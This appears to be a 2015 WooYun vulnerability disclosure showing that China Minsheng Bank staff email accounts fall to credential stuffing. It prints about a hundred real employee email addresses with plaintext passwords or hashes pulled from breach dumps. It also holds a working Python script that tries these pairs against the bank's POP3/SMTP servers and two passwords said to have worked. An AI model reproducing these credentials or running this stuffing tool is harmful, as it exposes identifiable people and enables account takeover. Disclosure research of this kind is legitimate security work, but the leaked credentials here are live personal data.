民生银行某内部系统缺陷可撞裤泄漏内部信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106427

漏洞标题：民生银行某内部系统缺陷可撞裤泄漏内部信息

漏洞作者： qq_hhl

提交时间：2015-04-07 19:34

修复时间：2015-05-23 09:02

公开时间：2015-05-23 09:02

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-07：细节已通知厂商并且等待厂商处理中
2015-04-08：厂商已经确认，细节仅向厂商公开
2015-04-18：细节向核心白帽子及相关领域专家公开
2015-04-28：细节向普通白帽子公开
2015-05-08：细节向实习白帽子公开
2015-05-23：细节向公众公开

简要描述：

http://www.wooyun.org/bugs/wooyun-2015-0106343
看这个帖子吧。我看到你们说会尽快把那两个账户回去修一下就知道怎么回事了，就想笑。
刚才招行的MM上门办信用卡，拖延了一下这篇文章的发表抱歉。
我再给你们列一些账户，你们得好好回去修一下。
民生银行对白帽子的态度是友好的，对白帽子的反馈的响应速度是很快的，但是知其然不知其所以然，修两个账户怎么能够呢，我列出来的邮箱的你们的这些员工应该拖回去被妈妈打屁股，银行这么敏感的行业，员工的网络安全意识参差不齐。该警醒了。

详细说明：

从如下公开数据库中搜索关键字cmbc.com.cn得到文件1.txt
CSDN：6,428,559条，微博：4,442,915条，人人网：4,445,047条，猫扑：2,644,726条，178：9,072,819条，嘟嘟牛：13,891,418条，7K7K：18,282,404条。
得到的1.txt不完全结果为

正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\10_766_16368_\10_766_16368_100SDA.txt
行号 771858 - 殺人基本靠脸 cmbc87218 sunyu6<@cmbc.com.cn>
行号 925298 - 殺人基本靠脸 cmbc87218 sunyu6<@cmbc.com.cn>
行号 1017873 - 雨轻轻弹 haoyu521 wanghaoyu<@cmbc.com.cn>
行号 1041351 - 冰汶 198924 jiangxiaoping<@cmbc.com.cn>
找到 4  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\10_766_16368_\10_766_16368_96万.txt
行号 487571 - 眉眼弯弯处 zhongai zhanglihui<@cmbc.com.cn>
行号 641420 - songfei1<@cmbc.com.cn> ---- sf301908
行号 647469 - dingjing<@cmbc.com.cn> ---- djy20090210
行号 678370 - huanghai<@cmbc.com.cn> ---- hh311516
行号 739584 - ZHANGXI2<@CMBC.COM.CN> ---- Mynameis9527
行号 778283 - yangyu5<@cmbc.com.cn> ---- 21214
找到 6  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\10_766_16368_\10_766_16368_FDQ-1002.TXt
行号 16085 - wanghai<@cmbc.com.cn> 199638
行号 523582 - guanwenfeng<@cmbc.com.cn> 111111
行号 570176 - jiangqiangxin<@cmbc.com.cn> 3368119770909
行号 776950 - wenwenjing<@cmbc.com.cn> 1qaz1234
行号 1023293 - linshi<@cmbc.com.cn> 123123
找到 5  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\10_766_16368_\10_766_16368_FDQ-1003.TXt
行号 853234 - liyiyang<@cmbc.com.cn> 19840807
找到 1  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\10_766_16368_\10_766_16368_FDQ-1004.TXt
行号 155029 - zhouyiying<@cmbc.com.cn> 5117519842214
行号 262344 - mengqingzhe<@cmbc.com.cn> test11
行号 380688 - 285725221<@cmbc.com.cn> 860303
行号 513868 - liuzhe3<@cmbc.com.cn> 840509
行号 559278 - liuzhiqiang<@cmbc.com.cn> 811021
行号 634080 - SHENYU<@cmbc.com.cn> 13137368311
行号 738646 - chenjifeng<@cmbc.com.cn> 19830129cjf
行号 840514 - clgirl100<@cmbc.com.cn> 840709
行号 951280 - shanaikun<@cmbc.com.cn> 111111
行号 1037770 - xiongcao<@cmbc.com.cn> diablo
找到 10  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\10_766_16368_\10_766_16368_FDQ-1005.TXt
行号 377264 - bjds2<@cmbc.com.cn> cmbccmbc
行号 949003 - tianbing<@cmbc.com.cn> harrison
找到 2  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\10_766_16368_\10_766_16368_mumayi.com数据库.sql.txt
行号 33466 - INSERT INTO mumayicdb_members VALUES('1509941', 'kyzy001645', 'edee935764a6e8645026000a306caa5c', '', '0', '0', '10', '0', '', '123.173.135.234', '1297477136', '', '1297477136', '1297477136', '1297477446', '1', '0', '0', '0', '0', '2', '0', '1', '0', '0', '0', '0', '0', '0', 'wangqian6<@cmbc.com.cn>', '0000-00-00', '0', '0', '0', '0', '0', '0', '1', '0', '1', '0', '9999', '1', '0', '2', '26', '0', '0', '0');
找到 1  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\11_7k7k2000万_2047_\11_7k7k2000万_2047_1-5.txt
行号 326371 - guzhenxin<@cmbc.com.cn> z1978x
行号 651528 - lixuyan<@cmbc.com.cn> lixuyan
行号 2037327 - chengjun<@cmbc.com.cn> 5201314
行号 4683887 - xiongcao<@cmbc.com.cn> diablo
行号 4936776 - wangning2<@cmbc.com.cn> 902418
行号 5061025 - chenxiang<@cmbc.com.cn> 790726
找到 6  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\11_7k7k2000万_2047_\11_7k7k2000万_2047_11-15.txt
行号 20629 - lvxiaoyong<@cmbc.com.cn> 197565
行号 115854 - shilei2<@cmbc.com.cn> slslsl
行号 210872 - zhangjia1<@cmbc.com.cn> 1387158179
行号 301047 - shiming<@cmbc.com.cn> symon0113
行号 315656 - chenxiuping<@cmbc.com.cn> 721219
行号 373906 - zhanglei17<@cmbc.com.cn> 498585zhanglei
行号 411897 - duxiaoxiao<@cmbc.com.cn> 520826
行号 422321 - lining2<@cmbc.com.cn> 1q2w3e0p
行号 472668 - xiechunzhang<@cmbc.com.cn> 3694769698
行号 634823 - jianglinlin<@cmbc.com.cn> 7732842603
行号 705964 - renfang<@cmbc.com.cn> 12345679
行号 719744 - jiangyangyang<@cmbc.com.cn> 599711
行号 730260 - huxiangyu<@cmbc.com.cn> k3ZeChmExt
行号 847559 - zhangjun1<@cmbc.com.cn> 654321
行号 947396 - longxinxin<@cmbc.com.cn> zhenxi8719
行号 1025285 - honglie<@cmbc.com.cn> EsnWtxRa65
行号 3096253 - duantao<@cmbc.com.cn> 202165
行号 3275475 - zhangqian5<@cmbc.com.cn> 19590601
行号 3319244 - wangtao10<@cmbc.com.cn> 1.98185E+11
行号 3403825 - xiaojianyu<@cmbc.com.cn> zxcasdqwe123
行号 3561351 - caidan<@cmbc.com.cn> MAuDA32ea8
行号 3641052 - mazhiwei<@cmbc.com.cn> 740120
行号 3802929 - shanningbo<@cmbc.com.cn> 121512
行号 3835001 - miaoli<@cmbc.com.cn> 829300
行号 3932810 - donglianqi<@cmbc.com.cn> 0o290o29
行号 3976951 - daijiajie<@cmbc.com.cn> 2.23805E+11
找到 26  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\11_7k7k2000万_2047_\11_7k7k2000万_2047_16-20.txt
行号 154719 - liuduantian<@cmbc.com.cn> tian81119
行号 191005 - bjds2<@cmbc.com.cn> cmbc8113
行号 199864 - chenjunying<@cmbc.com.cn> 13328699119
行号 268343 - huangchen<@cmbc.com.cn> 781121
行号 283002 - sunyunjin<@cmbc.com.cn> 779737
行号 331775 - liangchao1<@cmbc.com.cn> 551010
行号 338361 - zouyi<@cmbc.com.cn> 13751773011
行号 451288 - kongdewei<@cmbc.com.cn> 5.33422E+12
行号 478087 - fengguanlei<@cmbc.com.cn> 123456
行号 543008 - dongzhaohui<@cmbc.com.cn> dzhmsyh
行号 566663 - linjuan<@cmbc.com.cn> 520888
行号 689525 - liuyong<@cmbc.com.cn> vv6220099
行号 832030 - zhangyeru<@cmbc.com.cn> zyrmaggie991206
行号 853456 - zhangzhan<@cmbc.com.cn> z226063
行号 3253185 - liuhai1<@cmbc.com.cn> 83642021
行号 3283670 - zhangjijun<@cmbc.com.cn> qiao88l0320
行号 3699880 - cuitong<@cmbc.com.cn> 681013
行号 3728975 - linqin<@cmbc.com.cn> hikkb8cl
找到 18  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\11_7k7k2000万_2047_\11_7k7k2000万_2047_6-10.txt
行号 281898 - qinlong<@cmbc.com.cn> 111111
行号 408562 - yedingxin<@cmbc.com.cn> hanlili1
行号 528868 - qulihua<@cmbc.com.cn>.com 7724118
行号 2645284 - zhangjie5<@cmbc.com.cn> zhangjie112233
行号 2814337 - mawenyuan<@cmbc.com.cn> bbsc33625
行号 5304596 - sunyu6<@cmbc.com.cn> cmbc87218
行号 5397171 - wanghaoyu<@cmbc.com.cn> haoyu521
行号 5420649 - jiangxiaoping<@cmbc.com.cn> 198924
行号 5518368 - yangxiaobo<@cmbc.com.cn> yxb524
找到 9  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\12_aipai_1156_\12_aipai_1156_1000-1050W.txt
行号 121761 - nkt621        e476ad54a81d1c59a51ba9f84827b48b          wangying13<@cmbc.com.cn>
行号 169454 - oklixiok      ea6e904fb74499afb13279e4e534675f          lixi2<@cmbc.com.cn>
行号 321856 - wangpu6688    1b2f44cfb2f0d33535f713297ff30465          wangpu<@cmbc.com.cn>
行号 472707 - 流氓终结者         c295594b8680ea624f49e9956b8721ce          lucheng<@cmbc.com.cn>
找到 4  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\12_aipai_1156_\12_aipai_1156_1050-1100W.txt
行号 1903 - 姜竹席           ad813157af7cf71fa8738002ae2d1706          Jiangtianming<@cmbc.com.cn>
行号 241830 - kyzy001645    c34bc0126cca45a3eff8e1bd45ef2794          wangqian6<@cmbc.com.cn>
找到 2  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\12_aipai_1156_\12_aipai_1156_150-200W.txt
行号 178216 - 我爱李           994d049cbd8384dbcd13b8af433dd64f          likai5<@cmbc.com.cn>
行号 307685 - 罗伟            9ec3811e5ca57e20b51a33b3f0b78f06          luowei<@cmbc.com.cn>
行号 421605 - Smallfat      60eb4ed59a92d05d1f74424db8a6bdee          yedingxin<@cmbc.com.cn>
找到 3  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\12_aipai_1156_\12_aipai_1156_200-300W.txt
行号 471035 - 半拉科学家         0bd6f9e16d3b20c0ade11be57d3bbdd3          qinlong<@cmbc.com.cn>
找到 1  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\12_aipai_1156_\12_aipai_1156_300-400W.txt
行号 69460 - 樱一小无缺         663984488f2490e801b3faed9ad0d950          huzhiqiang<@cmbc.com.cn>
行号 543097 - guowf3167     32250170a0dca92d53ec9624f336ca24          guoweifeng<@cmbc.com.cn>
行号 599247 - 殺人基本靠脸        73a618c43006c783b4132e28780fbf20          sunyu6<@cmbc.com.cn>
找到 3  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\12_aipai_1156_\12_aipai_1156_451-500W.txt
行号 140551 - 雨轻轻弹          0528d261969da07a168c4ade83c646d4          wanghaoyu<@cmbc.com.cn>
行号 215916 - 冰汶            2ed8226869fef535781ac8dd9cf44978          jiangxiaoping<@cmbc.com.cn>
找到 2  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\12_aipai_1156_\12_aipai_1156_4月14日-4月25日.txt
行号 88338 - maomao_ii     c2df71a88b0e61dc3cffa0a7ca294150          shilin1<@cmbc.com.cn>
找到 1  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\12_aipai_1156_\12_aipai_1156_500-550W.txt
行号 8165 - 月之昼           174e8ddff3b7a8dbd2374cbe8258ca19          yangxiaobo<@cmbc.com.cn>
行号 259488 - 高手的奶嘴         faf2ca38c02c5f2ba1c49d200a03f9fb          xiongcao<@cmbc.com.cn>
找到 2  处。
正在处理文件: D:\BaiduYunDownload\shegongku\she拖库数据库_社工库\供notepad++搜索\12_aipai_1156_\12_aipai_1156_551-600W.txt
行号 78814 - 聖懿            c4ccb76933ae89ffacc2db959a26787f          huangkaiyong<@cmbc.com.cn>
找到 1  处。
搜索了 31 个文件，找到 107 处在 20 个文件中
执行被用户中断！

然后使用如下Python代码导入1.txt对民生银行邮件系统进行测试。

# coding=gb2312
import poplib
import smtplib
import sys
def checksmtppassword(smtp_server,username,password):
	try:
		server = smtplib.SMTP(smtp_server, 25)
		#server.set_debuglevel(2)	
		server.login(username, password)
	except:
		print '登录不成功'
	else:
		print '登录成功'
def checkpop3password(pop3_server,username,password):
	try:
		server = poplib.POP3(pop3_server)
		#server.set_debuglevel(2)
		server.user(username)
		server.pass_(password)
	except Exception,e:
		print '登录不成功'
	else:
		print '登录成功'
	server.quit()
		
def open_check_password_user(file_path,server_ip,user_num,pass_num,mode):
	mail_server=server_ip
	f=open(file_path)
	each_line=f.readline()
	while each_line:
		each_line=each_line.strip('\n')
		list = each_line.split()  
		#print list[0]
		password=list[ int(pass_num) ]
		username=list[ int(user_num) ]
		print list[ int(user_num) ]
		print list[ int(pass_num) ]
		if mode=='pop3' :
			checkpop3password(mail_server,username,password)
		if mode=='smtp' :
			checksmtppassword(mail_server,username,password)
				
		each_line=f.readline()
		
	
if __name__ == '__main__':
		print 'mail_check.py nefu.txt pop.nefu.edu.cn user_num pass_num mode'
		print 'mail_check.py nefu.txt pop.nefu.edu.cn  2 1 pop3/smtp'	
		open_check_password_user(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])

经过几分钟测试之后就拿到两个账户。
[email protected] katina8350
[email protected] vv6220099
.....
.....
.....
剩下的你们自己测吧，耗费时间的活。

漏洞证明：

我们使用上面的两个帐号密码进行登录。
邮箱都进去了，敏感信息都是一堆一堆的。
银行太敏感了，我就不做内网渗透了。
敏感信息只截图具有你们行特色的联系员工全国通讯录。
虽然方便了员工，但是.....
安全和用户体验你们还是要balance一下的。

修复方案：

知其然还要知其所以然，免费帮你们检测一下。不发工资，多给点rank也成。
强制你们的相关员工(特别多)改一下密码，并加强下安全意识吧..

版权声明：转载请注明来源 qq_hhl@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-04-08 09:00

厂商回复：

非常感谢兄弟的提交，thanks！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106427

漏洞标题：民生银行某内部系统缺陷可撞裤泄漏内部信息

相关厂商：中国民生银行

漏洞作者： qq_hhl

提交时间：2015-04-07 19:34

修复时间：2015-05-23 09:02

公开时间：2015-05-23 09:02

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 qq_hhl@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106427

漏洞标题：民生银行某内部系统缺陷可撞裤泄漏内部信息

相关厂商：中国民生银行

漏洞作者： qq_hhl

提交时间：2015-04-07 19:34

修复时间：2015-05-23 09:02

公开时间：2015-05-23 09:02

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0106427"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 qq_hhl@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：